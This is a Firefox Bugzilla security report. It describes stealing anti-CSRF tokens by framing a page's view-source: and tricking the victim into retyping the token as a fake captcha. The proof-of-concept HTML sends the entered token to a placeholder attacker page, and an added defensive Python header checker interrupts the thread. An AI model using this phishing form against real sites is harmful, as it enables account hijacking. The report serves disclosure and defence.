Closed Bug 1011848 Opened 11 years ago Closed 11 years ago

CSRF-Token Hijacking through SE + Firefox bug

Categories

(Firefox :: Security, defect)

32 Branch
x86
Windows XP
defect
Not set
normal


RESOLVED DUPLICATE of bug 624883

People

(Reporter: mr.k4rizma, Unassigned)

Details

(Keywords: csectype-disclosure, sec-moderate)

Attachments

(1 file)

User Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36

Steps to reproduce:

Hello Brother, almost all websites use an anti-csrf token in order to prevent csrf bugs. However, using social engineering and a bug in Firefox an attacker can simply steal this csrf-token.

The problem is in the "view-source:" option, because an attacker can iframe the source code of any page unless it's using X-Frame-Options: deny or X-Frame-Options: sameorigin. Through iframing the source code and using css, the attacker can convince the victim to enter the anti-csrf token as if it is a captcha or anything else. If the victim enters his anti-csrf token his account will be hijacked.

This simple code is written for the exploit purpose:

<iframe src=view-source:https://www.facebook.com/plugins/follow?href=https%3A%2F%2Fwww.facebook.com%2Fasesino.cero.cuatro&amp%3Blayout=standard&amp%3Bshow_faces=true&amp%3Bcolorscheme=light&amp%3Bwidth=450&amp%3Bheight=80 >
</iframe>
<form name="input" action="hackersite.com/malcious.php" method="get">
To prouve that you are human Enter The text that you see above : <input type="text" name="user">
<input type="submit" value="Submit">
</form>

With a little css I can only show the fb_dtsg, which is the anti-csrf token on facebook.

Actual results:

An attacker can iframe the source code of any website.

Expected results:

The attacker shouldn't be able to iframe the source code.
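The server-side condition the report names (the page is frameable unless it sends X-Frame-Options: deny or sameorigin), as an added Python example that is not code from the bug report or from Firefox: given the response headers of a page that renders an anti-CSRF token, it decides whether a third-party origin could embed it, treating a CSP frame-ancestors directive as taking precedence over X-Frame-Options. All URLs and header values are constructed samples.

```python
"""Added example (not from the bug report): decide from response headers whether
a page that renders an anti-CSRF token can be framed by a third-party origin."""
from urllib.parse import urlsplit


def _origin(url: str) -> str:
    """scheme://host[:port], lower-cased, for origin comparison."""
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()


def _csp_allows(policy: str, page: str, framer: str) -> bool:
    """Evaluate a CSP frame-ancestors source list against the framing origin."""
    sources = policy.lower().split()
    if not sources or "'none'" in sources:
        return False
    host = urlsplit(framer).hostname or ""
    for s in sources:
        if s == "*" or (s == "'self'" and _origin(framer) == _origin(page)):
            return True
        if s.startswith("'"):                                # other keywords: no match
            continue
        if "://" in s:                                       # full origin
            if _origin(framer) == _origin(s):
                return True
        elif s.startswith("*.") and host.endswith(s[1:]):    # host wildcard
            return True
        elif host == s:                                      # bare host, any scheme
            return True
    return False


def can_be_framed(page_url: str, headers: dict, framer_origin: str) -> bool:
    """True if a document from framer_origin may embed page_url. CSP frame-ancestors
    wins over X-Frame-Options; with neither, anyone (including a view-source: iframe
    on another site, as in the report) can frame it."""
    h = {k.lower(): v.strip() for k, v in headers.items()}
    for directive in h.get("content-security-policy", "").split(";"):
        name, _, value = directive.strip().partition(" ")
        if name.lower() == "frame-ancestors":
            return _csp_allows(value, page_url, framer_origin)
    xfo = h.get("x-frame-options", "").upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return _origin(framer_origin) == _origin(page_url)
    return True   # no recognised framing protection
```

Run it over the headers of every page that renders a token (settings, password-change, plugin endpoints): any page where the result is True for a foreign origin is exposed regardless of which browser bug is in play.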
Component: Untriaged → Security
Comment on attachment 8424321 [details]
The poc is a sample for a bug on (facebook + firefox)
That's rather ingenious. sec-moderate because this requires some user interaction. Jesse or anyone, is there any good reason we should allow view-source at all in subframes, or can we just neuter it?
Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: needinfo?(jruderman)
@Benjamin Smedberg I guess there is no good reason to allow view-source in subframes. It will only make some trouble; other browsers such as Google Chrome and Opera are disabling this option.
Status: NEW → RESOLVED
Closed: 11 years ago
Flags: needinfo?(jruderman)
Resolution: --- → DUPLICATE
Group: core-security → core-security-release
Group: core-security-release